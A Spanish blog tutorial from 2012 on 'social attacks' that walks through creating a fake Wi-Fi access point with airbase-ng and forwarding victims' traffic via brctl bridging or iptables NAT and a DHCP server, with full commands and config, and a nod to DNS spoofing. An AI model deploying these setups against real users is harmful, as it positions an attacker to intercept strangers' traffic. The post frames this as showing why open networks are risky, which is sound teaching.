martes, 31 de enero de 2012

Ataques sociales -- Creación de puntos de acceso

    Ataques sociales -- Creación de puntos de acceso

En los ataques anteriores eramos nosotros los que “atacábamos” los puntos de acceso, pero en este apartado nos centraremos en crear puntos de acceso falsos para que las “victimas” se conecten a ellos, demostrando que no es muy buena idea conectarse a un punto de acceso abierto.
Recalcar que para los “ataques sociales” necesitaremos dos interfaces de red .




Airbase-ng + brctl

En este punto crearemos un punto de acceso con airbase-ng y le daremos conexión a los clientes que se conecten a él mediante una interfaz puente con brctl .
>>>>> Documentacion airbase-ng:
>>>>> Documentacion brctl:

Partimos de que tenemos conectado el pc mediante cable de red (en el ejemplo interfaz eth0) a un router con acceso a Internet.
  1. Primero crearemos un punto de acceso con airbase-ng.
    sintaxis → airbase-ng -P -C 30 -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> <interfaz en modo monitor>
    airbase-ng -P -C 30 -c 6 -e APfalso mon0

  1. En otra terminal utilizaremos brctl para crear un puente entre la interfaz que nos suministra Internet (eth0) y la interfaz que crea airbase-ng (at0). Este puente lo llamaremos “puente”:sintaxis → brctl addbr <nombre del puente>sintaxisbrctl addif <nombre del puente> <interfaz a agregar al puente>sintaxis → brctl addif <nombre del puente> <interfaz a agregar al puente>
brctl addbr puente
brctl addif puente eth0
brctl addif puente at0
  1. Borramos la configuración de las interfaces de red utilizadas y habilitamos el ip forwarding:sintaxis → ifconfig <interfaz de red> 0.0.0.0 upsintaxis → ifconfig <interfaz de red airbase-ng> 0.0.0.0 upsintaxis → echo 1 > /proc/sys/net/ipv4/ip_forward
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
echo 1 > /proc/sys/net/ipv4/ip_forward
  1. Habilitamos la interfaz puente y lanzamos el cliente dhcp sobre ella.sintaxis → ifconfig <interfaz puente> upsintaxis → dhclient3 <interfaz puente>
    Por último solo nos queda esperar que los clientes se conecten a nuestro punto de acceso, cosa que veremos reflejada en la terminal con el airbase-ng:



Airbase-ng + iptables

Misma idea que el punto anterior, salvo que ahora los clientes se conectaran a una subnet creada por nosotros.

  1. Primero crearemos un punto de acceso con airbase-ng.
    sintaxis → airbase-ng -P -C 30 -c <canal de AP objetivo> -e <ESSID del punto de acceso objetivo> <interfaz en modo monitor>
    airbase-ng -P -C 30 -c 6 -e APfalso mon0

  1. Ahora configuraremos iptables para que redirija todo el trafico de la interfaz at0 creada por airbase-ng a la interfaz que tiene acceso a Internet (eth1), después habilitamos ip forwarding:sintaxis → iptables -t nat -A POSTROUTING -o <interfaz acceso Internet> -j MASQUERADEsintaxis → iptables -A INPUT -s 10.0.0.0/24 -i <interfaz airbase-ng> -j ACCEPTsintaxis → echo "1" >/proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o eth1 -j MASQUERADE
iptables -A INPUT -s 10.0.0.0/24 -i at0 -j ACCEPT
echo "1" >/proc/sys/net/ipv4/ip_forward
  1. Ahora configuraremos el servidor dhcp y lo guardaremos donde queramos, en mi caso en /etc/dhcp3/dhcpd.conf:option domain-name-servers 192.168.0.1;default-lease-time 60;max-lease-time 72;ddns-update-style none;authoritative;log-facility local7;subnet 10.0.0.0 netmask 255.255.255.0 {   range 10.0.0.100 10.0.0.254;   option routers 10.0.0.1;   option domain-name-servers 192.168.0.1;}
   Donde:
  • option domain-name-servers 192.168.0.1 → es el servidor DNS, en nuestro caso el router, aunque si tuviéramos nuestro propio servidor DNS configurado nos seria útil para un DNS spoofing por poner un ejemplo.
  • subnet 10.0.0.0 netmask 255.255.255.0 { → dirección de red y máscara de la subred.
  • range 10.0.0.100 10.0.0.254; → rango de direcciones que tendrán disponible los clientes que se conecten.
  • option routers 10.0.0.1; → el router de la subred que será la interfaz de airbase-ng.
  • option domain-name-servers 192.168.0.1; → DNS de la subred.

  1. El siguiente paso es habilitar la interfaz at0, asignarle una ip para que trabaje correctamente con nuestro servidor dhcp y lanzarlo:sintaxis → ifconfig <interfaz airbase-ng> up 10.0.0.1 netmask 255.255.255.0sintaxis → dhcpd3 -cf <lugar donde esta la configuracion del servidor dhcp> <interfaz airbase-ng>
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Por último solo nos queda esperar a que alguien se conecte al punto de acceso, cosa que airbase-ng reflejará de la siguiente forma:

No hay comentarios:

Publicar un comentario